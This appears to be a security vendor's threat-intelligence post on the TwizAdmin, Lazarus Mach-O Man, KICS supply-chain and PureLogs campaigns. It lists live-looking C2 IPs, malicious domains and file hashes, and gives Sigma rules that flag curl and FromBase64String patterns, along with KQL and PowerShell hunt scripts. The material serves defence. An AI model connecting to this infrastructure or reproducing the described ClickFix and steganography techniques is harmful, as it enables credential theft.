Back to Intelligence

TwizAdmin, Lazarus Mach-O Man & Supply Chain Attacks: Cross-Platform Credential Theft

SA
Security Arsenal Team
May 22, 2026
6 min read

Recent OTX pulses indicate a convergence of sophisticated credential theft operations spanning multiple operating systems and attack vectors. The DataBreachPlus group is actively deploying the TwizAdmin suite, a multi-stage malware operation combining cryptocurrency clipboard hijacking, BIP-39 seed phrase theft, and a ransomware module (crpx0) managed via a FastAPI C2 panel. Simultaneously, the Lazarus Group has accelerated campaigns targeting the finance and technology sectors with "Mach-O Man," a macOS malware kit distributed via ClickFix social engineering attacks impersonating collaboration software.

A critical supply chain compromise affecting Checkmarx KICS (attributed to TeamPCP) highlights the risk of credential theft via poisoned development tooling, where trojanized Docker images and VS Code extensions exfiltrate secrets. Additionally, the PureLogs infostealer is utilizing PawsRunner, a steganography loader, to conceal malicious payloads within image files to evade detection. While FrostyNeighbor continues cyberespionage activities in Eastern Europe using Cobalt Strike, the overarching theme across these pulses is the aggressive targeting of credentials, cryptocurrency assets, and infrastructure secrets.

Threat Actor / Malware Profile

TwizAdmin (DataBreachPlus)

  • Distribution: Multi-platform (Windows/macOS) via FedEx-themed lures and malicious downloads.
  • Payload Behavior: Modular malware featuring a crypto-clipper (8 blockchains), BIP-39 seed theft, browser credential exfiltration, and a ransomware module (crpx0).
  • C2 Communication: Managed via a FastAPI-based panel located at exposed IPs (e.g., 103.241.66[.]238:1337) requiring a license key.
  • Persistence: Maintains access through typical OS persistence mechanisms while awaiting C2 commands.

Mach-O Man (Lazarus Group)

  • Distribution: ClickFix attacks via fake meeting invitations on Telegram, redirecting to fraudulent collaboration platforms.
  • Payload Behavior: "Mach-O Man" malware kit; deploys PyLangGhostRAT for remote access and credential theft.
  • C2 Communication: Exfiltrates data via Telegram channels and custom C2 infrastructure.
  • Social Engineering: Triggers execution by convincing users to copy/paste terminal commands masquerading as software fixes.

TeamPCP (KICS Supply Chain)

  • Distribution: Poisoned Docker Hub images (tags v2.1.20, v2.1.21) and VS Code extensions (v1.17.0, 1.19.0).
  • Payload Behavior: Trojanized KICS binary (mcpAddon.js / Canister Worm) collects and encrypts scan reports containing credentials.
  • Objective: Long-term persistence in development environments to siphon infrastructure-as-code secrets.

PureLogs (PawsRunner)

  • Distribution: Phishing emails with TXZ archive attachments containing invoice-themed lures.
  • Payload Behavior: PawsRunner steganography loader extracts encrypted .NET infostealers from benign-looking PNG files.
  • Execution Chain: JavaScript -> PowerShell (decoding) -> PawsRunner (Stego extraction) -> PureLogs (Infostealer).

IOC Analysis

The provided intelligence contains a mix of network and file-based indicators:

  • Domains & URLs: Typosquatting domains (e.g., livemicrosft.com) and malware distribution sites (e.g., fanonlyatn.xyz). These should be blocked at the DNS and Web Proxy level immediately.
  • File Hashes: A robust list of SHA256 and MD5 hashes corresponding to droppers, loaders, and malicious binaries for TwizAdmin, Mach-O Man, and KICS.
  • IP Addresses: Specific C2 IPs such as 103.241.66.238 and 5.101.84.202.

Operational Guidance: SOC teams should prioritize the SHA256 hashes for EDR hunting. The presence of MD5 hashes in the KICS pulse suggests checking legacy build systems or unpacked layers in Docker images. YARA rules should be created to scan the fanonlyatn.xyz URL patterns in logs.

Detection Engineering

YAML
---
title: Potential TwizAdmin C2 Activity
id: 5c6b7a8d-9e1f-4a2c-8b3d-1e4f5a6b7c8d
description: Detects potential network connections to known TwizAdmin C2 infrastructure or FastAPI panels on non-standard ports.
status: experimental
author: Security Arsenal
date: 2026/05/23
references:
    - https://intel.breakglass.tech/post/twizadmin-103-241-66
tags:
    - attack.command_and_control
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        DestinationPort|startswith: '133'
        Initiated: 'true'
    condition: selection
falsepositives:
    - Legitimate development traffic on high ports
level: high
---
title: Steganography Loader Execution via PowerShell
id: 9d8e7f6a-5b4c-3d2e-1f0a-9b8c7d6e5f4a
description: Detects PowerShell scripts attempting to read image files, indicative of PawsRunner steganography activity.
status: experimental
author: Security Arsenal
date: 2026/05/23
references:
    - https://www.fortinet.com/blog/threat-research/purelogs-delivery-via-pawsrunner-steganography
tags:
    - attack.defense_evasion
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\\powershell.exe'
        CommandLine|contains:
            - 'System.Drawing'
            - 'FromBase64String'
            - '.png'
            - '.bmp'
    condition: selection
falsepositives:
    - Legitimate image processing scripts
level: medium
---
title: Lazarus Group Mach-O Man Fake Meeting Lure
id: 1a2b3c4d-5e6f-7a8b-9c0d-1e2f3a4b5c6d
description: Detects macOS terminal execution patterns associated with Lazarus ClickFix attacks involving fake meeting software.
status: experimental
author: Security Arsenal
date: 2026/05/23
references:
    - https://any.run/cybersecurity-blog/lazarus-macos-malware-mach-o-man/
tags:
    - attack.initial_access
    - attack.social_engineering
logsource:
    category: process_creation
    product: macos
detection:
    selection:
        Image|endswith:
            - '/bin/bash'
            - '/bin/zsh'
            - '/usr/bin/osascript'
        CommandLine|contains:
            - 'curl'
            - 'meeting'
            - 'teams'
            - 'zoom'
    condition: selection
falsepositives:
    - Legitimate installation of collaboration tools
level: high


kql
// Hunt for TwizAdmin and PureLogs related file hashes and domains
let IoC_Domains = dynamic(["fanonlyatn.xyz", "livemicrosft.com", "everycarebd.com"]);
let IoC_Hashes = dynamic(["06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092", "0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90", "d47de3772f2d61a043e7047431ef4cf4"]);
// Network Connections
DeviceNetworkEvents
| where RemoteUrl in (IoC_Domains) or RemoteIP in ("103.241.66.238", "5.101.84.202")
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP
| union (
    DeviceProcessEvents
    | where SHA256 in (IoC_Hashes) or MD5 in ("d47de3772f2d61a043e7047431ef4cf4")
    | project Timestamp, DeviceName, FolderPath, SHA256, ProcessCommandLine
)
| sort by Timestamp desc


powershell
# IOC Hunt Script for TwizAdmin & PureLogs Artifacts
# Check for specific file hashes on disk
$HashesToCheck = @(
    "06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092",
    "0fcb86ae384e9975933314ac2a231f0ff46c0208556bf4a16f096a642d3f505e",
    "d47de3772f2d61a043e7047431ef4cf4"
)

Write-Host "[+] Scanning for malicious file hashes..."
Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue | 
Where-Object { $_.Length -gt 0kb -and $_.Length -lt 50MB } | 
ForEach-Object {
    $Hash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
    if ($HashesToCheck -contains $Hash) {
        Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName) (Hash: $Hash)" -ForegroundColor Red
    }
}

# Check for network connections to known C2 IPs
$C2IPs = @("103.241.66.238", "5.101.84.202")
Write-Host "[+] Checking active network connections for C2 IPs..."
netstat -ano | Select-String "103.241.66.238","5.101.84.202" | ForEach-Object {
    Write-Host "[!] SUSPICIOUS CONNECTION: $_" -ForegroundColor Yellow
}

Write-Host "[+] Hunt complete."

Response Priorities

  • Immediate: Block all listed IOCs (Domains fanonlyatn.xyz, livemicrosft.com, IPs 103.241.66.238, 5.101.84.202) at perimeter firewalls and proxies. Initiate EDR scans for the provided SHA256 hashes.
  • 24h: Conduct a credential audit for users who may have interacted with the fake meeting invites (Lazarus) or downloaded the trojanized KICS tools. Reset passwords for exposed service accounts found in IaC scans.
  • 1 Week: Review and enforce supply chain security policies. Verify the integrity of all Docker images and VS Code extensions within the enterprise environment. Implement application allow-listing for terminal commands on macOS endpoints to mitigate ClickFix attacks.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-credentialstwizadminlazarus-groupsupply-chain-attacksteganographycredential-theft

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action